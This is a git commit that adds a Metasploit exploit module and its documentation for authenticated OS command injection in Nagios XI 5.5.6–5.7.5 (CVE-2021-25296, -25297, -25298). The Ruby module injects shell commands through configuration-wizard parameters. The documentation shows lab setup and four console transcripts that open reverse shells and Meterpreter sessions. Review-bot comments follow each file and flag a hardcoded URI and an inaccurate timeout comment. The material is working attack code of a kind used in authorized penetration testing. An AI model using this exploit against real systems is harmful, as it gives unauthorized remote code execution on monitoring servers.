Land #17494, Add NagiosXI authenticated RCE (CVE-2021-25296, CVE-2021-25297, CVE-2021-25298) exploit module

Grant Willcox 2023-02-07 15:38:36 -06:00
commit c2e8f3fa69
GPG Key ID: D35E05C0F2B81E83
2 changed files with 723 additions and 0 deletions

@ -0,0 +1,451 @@
## Vulnerable Application
This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298: OS command injection vulnerabilities
in `/nagiosxi/config/monitoringwizard.php` that enable an authenticated user to achieve remote code execution
on NagiosXI from versions 5.5.6 to 5.7.5 as the `apache` user. There are three vulnerable configuration wizards
(`windowswmi`, `switch`, `cloud-vm`). The `windowswmi` configuration wizard is vulnerable
to CVE-2021-25296 via command injection in the `plugin_output_len` parameter. `switch` and
`cloud-vm` are vulnerable to CVE-2021-25297 and CVE-2021-25298 respectively, and use the
`ip_address` parameter, though on version 5.5.7 and prior of NagiosXI this parameter was
named `address`.
The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate
to the target and obtain the version of Nagios XI installed, which is then used to check if the target is running a version
of NagiosXI between versions 5.5.6 and 5.7.5.
### Installation Steps
Note: The module can attempt to complete the configuration steps after NagiosXI has been installed.
#### Pre-installed OVA
1. Download an OVA with NagiosXI installed
1. An OVA with a vulnerable NagiosXI 5.7.5 application can be downloaded from
Nagios [here](https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.7.5-64.ova).
2. To download other vulnerable versions, replace the version number in the URL with the desired version.
2. Configure the NagiosXI installation
1. The OVA has NagiosXI running on startup. Launch the VM and visit the VM's IP in a browser.
2. Go through defaults on the install. When you get to Admin Account Settings, configure the `nagiosadmin`
user's password and whether you'd like to force HTTPS.
3. Login as the `nagiosadmin` user and accept the license agreement when prompted.
#### Manual Install on Linux
Note: NagiosXI can only be installed on specific operating systems (RHEL, CentOS, Oracle Linux, Debian, Ubuntu).
Supported version numbers can be found in the installation guide
[here](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf). Older versions of
NagiosXI might require older versions of the operating systems mentioned. Consult the specific version's documentation if errors occur
on newer distributions.
1. Download NagiosXI
1. Choose a version between 5.5.6 and 5.7.5 from [here](https://www.nagios.com/downloads/nagios-xi/older-releases/)
2. Install NagiosXI with the following commands
1. `tar xzf xi-5.7.5.gz`
2. `cd nagiosxi`
3. `./fullinstall`
3. Configure the NagiosXI installation
1. Visit the installed NagiosXI application in a web browser.
2. Go through defaults on the install. When you get to Admin Account Settings, configure the `nagiosadmin`
user's password and whether you'd like to force HTTPS.
3. Login as the `nagiosadmin` user and accept the license agreement when prompted.
### Troubleshooting Installation
- NagiosXI doesn't show it's ip address
- Login as the `root` user with `nagiosxi` as the password, and run `ip a` to get the IP
- Ensure it's on a network accessible from your attacking machine (e.g. NAT network instead of Bridged)
- NagiosXI fails when attempting to login manually with an "NSP Sorry Dave" message
- The NagiosXI installation is likely out of sync with its date/time.
- Set it manually with `timedatectl set-ntp false` and `timedatectl set-time '2023-02-06 17:34:00'` but with the actual time and date
## Verification Steps
- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/nagios_xi_configwizards_authenticated_rce`
- [ ] `set RHOSTS TARGET_IP`
- [ ] `set RPORT 443`
- [ ] `set SSL true`
- [ ] `set USERNAME USER`
- [ ] `set PASSWORD PASSWORD`
- [ ] `set TARGET_CVE CVE-2021-25296`
- [ ] `set LHOST YOUR_IP`
- [ ] `set LPORT YOUR_LISTENING_PORT`
- [ ] `run`
## Options
### USERNAME
A valid NagiosXI username, which can be for an administrator or regular user.
### PASSWORD
The password for the provided NagiosXI username.
### TARGET_CVE
The CVE to target. Each CVE corresponds to a specific target:
- CVE-2021-25296: `windowswmi` configuration wizard RCE via the `plugin_output_len` URL parameter
- CVE-2021-25297: `switch` configuration wizard RCE via the `ip_address` URL parameter.
Note that on versions 5.5.7 and prior this parameter is named `address` instead.
- CVE-2021-25298: `cloud-vm` configuration wizard RCE via the `ip_address` URL parameter.
Note that on versions 5.5.7 and prior this parameter is named `address` instead.
Note that CVE-2021-25298 is in the `cloud-vm` configuration wizard but we set the `wizard`
URL parameter value to `digitalocean` in order to make sure we use this wizard; there are
potentially other values that could be used here.
## Scenarios
### CentOS7 Running NagiosXI 5.7.5 (Official OVA) - CVE-2021-25296
```
msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
[*] Using configured payload cmd/unix/reverse_perl_ssl
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.132
RHOST => 192.168.153.132
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
LHOST => 192.168.153.128
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FINISH_INSTALL true
FINISH_INSTALL => true
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set USERNAME nagiosadmin
USERNAME => nagiosadmin
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
PASSWORD => nagiosadmin
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.132
RHOST => 192.168.153.132
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
LHOST => 192.168.153.128
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FIN
set FINGERPRINTCHECK set FINISH_INSTALL
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FINISH_INSTALL true
FINISH_INSTALL => true
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
FINISH_INSTALL true no If the Nagios XI installation has not been completed,
try to do so. This includes signing the license agreem
ent.
PASSWORD nagiosadmin no Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port
][...]
RHOSTS 192.168.153.132 yes The target host(s), see https://github.com/rapid7/meta
sploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This
must be an address on the local machine or 0.0.0.0 to
listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly
generated)
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
TARGET_CVE CVE-2021-25296 yes CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE
-2021-25298)
URIPATH no The URI to use for this exploit (default is random)
USERNAME nagiosadmin no Username to authenticate with
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_perl_ssl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.153.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 CMD
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
[*] Started reverse SSL handler on 192.168.153.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[!] The target seems to be a Nagios XI application that has not been fully installed yet.
[*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
[*] Attempting to authenticate to Nagios XI...
[!] The Nagios XI license agreement has not yet been signed on the target.
[*] Attempting to sign the Nagios XI license agreement...
[*] License agreement signed. The module will wait for 5 seconds and retry the login.
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.7.5.
[+] The target appears to be vulnerable.
[*] Sending the payload...
[*] Command shell session 1 opened (192.168.153.128:4444 -> 192.168.153.132:56222) at 2023-02-07 11:33:53 -0600
id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
pwd
/usr/local/nagiosxi/html/config
uname -a
Linux localhost.localdomain 3.10.0-1160.2.2.el7.x86_64 #1 SMP Tue Oct 20 16:53:08 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
```
### CentOS7 Running NagiosXI 5.7.5 (Official OVA) - CVE-2021-25297
```
msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
[*] Using configured payload cmd/unix/reverse_perl_ssl
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.132
RHOST => 192.168.153.132
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
LHOST => 192.168.153.128
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set USERNAME nagiosadmin
USERNAME => nagiosadmin
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
PASSWORD => nagiosadmin
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
FINISH_INSTALL false no If the Nagios XI installation has not been completed,
try to do so. This includes signing the license agreem
ent.
PASSWORD nagiosadmin no Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port
][...]
RHOSTS 192.168.153.132 yes The target host(s), see https://github.com/rapid7/meta
sploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This
must be an address on the local machine or 0.0.0.0 to
listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly
generated)
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
TARGET_CVE CVE-2021-25296 yes CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE
-2021-25298)
URIPATH no The URI to use for this exploit (default is random)
USERNAME nagiosadmin no Username to authenticate with
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_perl_ssl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.153.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 CMD
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET_CVE CVE-2021-25297
TARGET_CVE => CVE-2021-25297
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
[*] Started reverse SSL handler on 192.168.153.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.7.5.
[+] The target appears to be vulnerable.
[*] Sending the payload...
[*] Command shell session 1 opened (192.168.153.128:4444 -> 192.168.153.132:56322) at 2023-02-07 11:44:00 -0600
id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
whoami
apache
uname -a
Linux localhost.localdomain 3.10.0-1160.2.2.el7.x86_64 #1 SMP Tue Oct 20 16:53:08 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
```
### CentOS7 Running NagiosXI 5.7.5 (Official OVA) - CVE-2021-25298
```
msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
[*] Using configured payload cmd/unix/reverse_perl_ssl
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set USERNAME nagiosadmin
USERNAME => nagiosadmin
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
PASSWORD => nagiosadmin
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET_CVE CVE-2021-25298
TARGET_CVE => CVE-2021-25298
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
LHOST => 192.168.153.128
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.132
RHOST => 192.168.153.132
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET Linux\ (x64)
TARGET => Linux (x64)
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
FINISH_INSTALL false no If the Nagios XI installation has not been completed,
try to do so. This includes signing the license agreem
ent.
PASSWORD nagiosadmin no Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port
][...]
RHOSTS 192.168.153.132 yes The target host(s), see https://github.com/rapid7/meta
sploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This
must be an address on the local machine or 0.0.0.0 to
listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly
generated)
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
TARGET_CVE CVE-2021-25298 yes CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE
-2021-25298)
URIPATH no The URI to use for this exploit (default is random)
USERNAME nagiosadmin no Username to authenticate with
VHOST no HTTP server virtual host
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.153.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Linux (x64)
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LPORT 9912
LPORT => 9912
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FINISH_INSTALL true
FINISH_INSTALL => true
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
[*] Started reverse TCP handler on 192.168.153.128:9912
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[!] The target seems to be a Nagios XI application that has not been fully installed yet.
[*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
[*] Attempting to authenticate to Nagios XI...
[!] The Nagios XI license agreement has not yet been signed on the target.
[*] Attempting to sign the Nagios XI license agreement...
[*] License agreement signed. The module will wait for 5 seconds and retry the login.
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.7.5.
[+] The target appears to be vulnerable.
[*] Sending the payload...
[*] Sending stage (3045348 bytes) to 192.168.153.132
[*] Meterpreter session 1 opened (192.168.153.128:9912 -> 192.168.153.132:32878) at 2023-02-07 11:48:50 -0600
[*] Command Stager progress - 100.00% done (833/833 bytes)
meterpreter >
meterpreter > getuid
Server username: apache
meterpreter > getprivs
[-] The "getprivs" command is not supported by this Meterpreter type (x64/linux)
meterpreter > sysinfo
Computer : localhost.localdomain
OS : CentOS 7.9.2009 (Linux 3.10.0-1160.2.2.el7.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > pwd
/usr/local/nagiosxi/html/config
meterpreter >
```
### CentOS7 Running NagiosXI 5.5.6 (Official OVA) - CVE-2021-25297
```
msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
[*] Using configured payload cmd/unix/reverse_perl_ssl
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOSTS 192.168.104.18
RHOSTS => 192.168.104.18
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
PASSWORD => nagiosadmin
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET_CVE CVE-2021-25297
TARGET_CVE => CVE-2021-25297
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.104.2
LHOST => 192.168.104.2
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LPORT 8443
LPORT => 8443
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
FINISH_INSTALL false no If the Nagios XI installation has not been completed, try to do so. This includes signin
g the license agreement.
PASSWORD nagiosadmin no Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.104.18 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasp
loit
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local m
achine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
TARGET_CVE CVE-2021-25297 yes CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)
URIPATH no The URI to use for this exploit (default is random)
USERNAME nagiosadmin no Username to authenticate with
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_perl_ssl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.104.2 yes The listen address (an interface may be specified)
LPORT 8443 yes The listen port
Exploit target:
Id Name
-- ----
2 CMD
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
[*] Started reverse SSL handler on 192.168.104.2:8443
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.5.6.
[+] The target appears to be vulnerable.
[*] Sending the payload...
[*] Command shell session 1 opened (192.168.104.2:8443 -> 192.168.104.18:58930) at 2023-02-07 14:27:41 -0500
id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
whoami
apache
uname -a
Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
```
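Review bot: the Options section documents only USERNAME, PASSWORD and TARGET_CVE, but every scenario that completes a fresh OVA relies on `set FINISH_INSTALL true`, and the module output shows that option finishing the installation and signing the license agreement on the target; add a FINISH_INSTALL entry under Options that states it modifies target state (completing the install with the supplied password as `nagiosadmin` and signing the license agreement) rather than leaving it to be discovered from `show options`. The first scenario transcript should also be trimmed: `set RHOST`, `set LHOST` and `set FINISH_INSTALL true` are each issued twice, and the tab-completion residue `set FIN` / `set FINGERPRINTCHECK set FINISH_INSTALL` adds nothing. Under Troubleshooting Installation, "NagiosXI doesn't show it's ip address" should read "its IP address".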

@ -0,0 +1,272 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::NagiosXi
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection',
'Description' => %q{
This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are
OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm
configuration wizards that allow an authenticated user to perform remote code
execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user.
Valid credentials for a Nagios XI user are required. This module has
been successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5.
},
'License' => MSF_LICENSE,
'Author' => [
'Matthew Mathur'
],
'References' => [
['CVE', '2021-25296'],
['CVE', '2021-25297'],
['CVE', '2021-25298'],
['URL', 'https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md']
],
'Platform' => %w[linux unix],
'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
'Targets' => [
[
'Linux (x86)', {
'Arch' => [ ARCH_X86 ],
'Platform' => 'linux',
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
}
],
[
'Linux (x64)', {
'Arch' => [ ARCH_X64 ],
'Platform' => 'linux',
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
}
],
[
'CMD', {
'Arch' => [ ARCH_CMD ],
'Platform' => 'unix',
# the only reliable payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' }
}
]
],
'Privileged' => false,
'DefaultTarget' => 2,
'DisclosureDate' => '2021-02-13',
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ]
}
)
)
register_options [
OptString.new('TARGET_CVE', [true, 'CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)', 'CVE-2021-25296'])
]
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def finish_install
datastore['FINISH_INSTALL']
end
# Returns a status code an a error message on failure.
# On success returns the status code and an array so we
# can update the login_result and res_array variables appropriately.
def handle_unsigned_license(res_array, username, password, finish_install)
auth_cookies, nsp = res_array
sign_license_result = sign_license_agreement(auth_cookies, nsp)
if sign_license_result
return 5, 'Failed to sign license agreement'
end
print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')
sleep 5
login_result, res_array = login_after_install_or_license(username, password, finish_install)
case login_result
when 1..4 # An error occurred, propagate the error message
return login_result, res_array[0]
when 5 # The Nagios XI license agreement still has not been signed
return 5, 'Failed to sign the license agreement.'
end
return login_result, res_array
end
def authenticate
# Use nagios_xi_login to try and authenticate.
login_result, res_array = nagios_xi_login(username, password, finish_install)
case login_result
when 1..3 # An error occurred, propagate the error message
return login_result, res_array[0]
when 4 # Nagios XI is not fully installed
install_result = install_nagios_xi(password)
if install_result # On installation failure, result is an array with the code and error message
return install_result[0], install_result[1]
end
login_result, res_array = login_after_install_or_license(username, password, finish_install)
case login_result
when 1..4 # An error occurred, propagate the error message
return login_result, res_array[0]
when 5 # The license agreement still needs to be signed
login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
return login_result, res_array unless (login_result == 0)
end
when 5 # The license agreement still needs to be signed
login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
return login_result, res_array unless (login_result == 0)
end
print_good('Successfully authenticated to Nagios XI.')
# Extract the authenticated cookies and nsp to use throughout the module
if res_array.length == 2
auth_cookies = res_array[1]
if auth_cookies && /nagiosxi=[a-z0-9]+;/.match(auth_cookies)
@auth_cookies = auth_cookies
else
return login_result, 'Failed to extract authentication cookies'
end
nsp = res_array[0].match(/nsp_str = "([a-z0-9]+)/)
if nsp
@nsp = nsp[1]
else
return login_result, 'Failed to extract nsp string'
end
else
return login_result, 'Failed to extract auth cookies and nsp string'
end
# Set the version here so both check and exploit can use it
nagios_version = nagios_xi_version(res_array[0])
if nagios_version.nil?
return 6, 'Unable to obtain the Nagios XI version from the dashboard'
end
print_status("Target is Nagios XI with version #{nagios_version}.")
# Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,
# so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.
if /^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'
nagios_version = '1.0.0'
end
@version = Rex::Version.new(nagios_version)
return 0, 'Successfully authenticated and retrieved NagiosXI Version.'
end
def check
# Authenticate to ensure we can access the NagiosXI version
auth_result, err_msg = authenticate
case auth_result
when 1
return CheckCode::Unknown(err_msg)
when 2, 4, 5, 6
return CheckCode::Detected(err_msg)
when 3
return CheckCode::Safe(err_msg)
end
if @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.7.5')
return CheckCode::Appears
end
return CheckCode::Safe
end
def execute_command(cmd, _opts = {})
if !@nsp || !@auth_cookies # Check to see if we already authenticated during the check
auth_result, err_msg = authenticate
case auth_result
when 1
fail_with(Failure::Disconnected, err_msg)
when 2, 4, 5, 6
fail_with(Failure::UnexpectedReply, err_msg)
when 3
fail_with(Failure::NotVulnerable, err_msg)
end
end
# execute payload based on the selected targeted configuration wizard
url_params = {
'update' => 1,
'nsp' => @nsp
}
# After version 5.5.7, the URL parameter used in CVE-2021-25297 and CVE-2021-25298
# changes from address to ip_address
if @version <= Rex::Version.new('5.5.7')
address_param = 'address'
else
address_param = 'ip_address'
end
# CVE-2021-25296 affects the windowswmi configuration wizard.
if datastore['TARGET_CVE'] == 'CVE-2021-25296'
url_params = url_params.merge({
'nextstep' => 3,
'wizard' => 'windowswmi',
'ip_address' => Array.new(4) { rand(256) }.join('.'),
'domain' => Rex::Text.rand_text_alphanumeric(7..15),
'username' => Rex::Text.rand_text_alphanumeric(7..20),
'password' => Rex::Text.rand_text_alphanumeric(7..20),
'plugin_output_len' => Rex::Text.rand_text_numeric(5) + "; #{cmd};"
})
# CVE-2021-25297 affects the switch configuration wizard.
elsif datastore['TARGET_CVE'] == 'CVE-2021-25297'
url_params = url_params.merge({
'nextstep' => 3,
'wizard' => 'switch',
address_param => Array.new(4) { rand(256) }.join('.') + "\"; #{cmd};",
'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alphanumeric(7..15),
'scaninterfaces' => 'on'
})
# CVE-2021-25298 affects the cloud-vm configuration wizard, which we can access by
# specifying the digitalocean option for the wizard parameter.
elsif datastore['TARGET_CVE'] == 'CVE-2021-25298'
url_params = url_params.merge({
address_param => Array.new(4) { rand(256) }.join('.') + "; #{cmd};",
'nextstep' => 4,
'wizard' => 'digitalocean'
})
else
fail_with(Failure::BadConfig, 'Invalid TARGET_CVE: Choose CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298.')
end
print_status('Sending the payload...')
# Send the final request. Note that the target is not expected to respond if we get
# code execution. Therefore, we set the timeout on this request to 0.
send_request_cgi({
'method' => 'GET',
'uri' => '/nagiosxi/config/monitoringwizard.php',
'cookie' => @auth_cookies,
'vars_get' => url_params
})
end
def exploit
if target.arch.first == ARCH_CMD
execute_command(payload.encoded)
else
execute_cmdstager(background: true)
end
end
end
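Review bot: `execute_command` hardcodes `'uri' => '/nagiosxi/config/monitoringwizard.php'`, so the TARGETURI option the module exposes (default `/nagiosxi/`, described as "The base path to the Nagios XI application") is never honoured and a deployment under a different base path cannot be reached; build the path with `normalize_uri(target_uri.path, 'config', 'monitoringwizard.php')` instead. In the same method the comment above `send_request_cgi` says "we set the timeout on this request to 0", but no timeout argument is passed, so the default HttpClient timeout applies and an ARCH_CMD payload that holds the connection open will block for that period; either pass the timeout explicitly or correct the comment. Since `FINISH_INSTALL` completes the Nagios XI installation and signs the license agreement on the target, `SideEffects` should include CONFIG_CHANGES alongside ARTIFACTS_ON_DISK and IOC_IN_LOGS. Finally, the 'Name' string misspells "Execution" as "Exection".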